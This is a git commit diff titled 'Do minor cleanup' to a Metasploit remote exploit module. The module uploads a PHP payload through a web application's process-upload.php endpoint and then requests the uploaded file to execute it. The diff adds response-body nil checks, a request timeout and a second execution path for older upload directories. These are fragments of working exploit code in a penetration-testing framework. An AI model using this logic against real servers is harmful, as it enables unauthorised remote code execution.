Do minor cleanup

bug/bundler_fix
jvazquez-r7 2014-12-26 11:24:02 -06:00
parent 5c82b8a827
commit b5b0be9001
1 changed files with 15 additions and 13 deletions

View File

@ -67,20 +67,20 @@ class Metasploit3 < Msf::Exploit::Remote
elsif res.code.to_i == 500
vprint_error("#{peer} - Unable to write file")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /<\?php/
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
vprint_error("#{peer} - Software is misconfigured")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body =~ /jsonrpc/
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
# response on revision 118 onwards includes the file name
if res.body =~ /NewFileName/
if res.body && res.body =~ /NewFileName/
return Exploit::CheckCode::Vulnerable
# response on revisions 100 to 117 does not include the file name
elsif res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
return Exploit::CheckCode::Appears
elsif res.body =~ /Failed to open output stream/
elsif res.body && res.body =~ /Failed to open output stream/
vprint_error("#{peer} - Upload folder is not writable")
return Exploit::CheckCode::Safe
else
@ -113,14 +113,14 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
elsif res.code.to_i == 200 && res.body =~ /Failed to open output stream/
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
elsif res.code.to_i == 200 && res.body =~ /<\?php/
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
# response on revision 118 onwards includes the file name
elsif res.code.to_i == 200 && res.body =~ /NewFileName/
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
print_good("#{peer} - Payload uploaded successfully (#{fname})")
return fname
# response on revisions 100 to 117 does not include the file name
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Exploit::Remote
def exec(upload_path)
print_status("#{peer} - Executing #{upload_path}...")
res = send_request_raw(
'uri' => normalize_uri(target_uri.path, upload_path)
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
)
if !res
print_error("#{peer} - Request timed out while executing")
print_status("#{peer} - Request timed out while executing")
elsif res.code.to_i == 404
vprint_error("#{peer} - Not found: #{upload_path}")
elsif res.code.to_i == 200
@ -159,6 +159,8 @@ class Metasploit3 < Msf::Exploit::Remote
fname = upload
register_files_for_cleanup(fname)
exec("upload/files/#{fname}") # default for r-221 onwards
unless session_created?
exec("upload/temp/#{fname}") # default for r-100 to r-219
end
end
end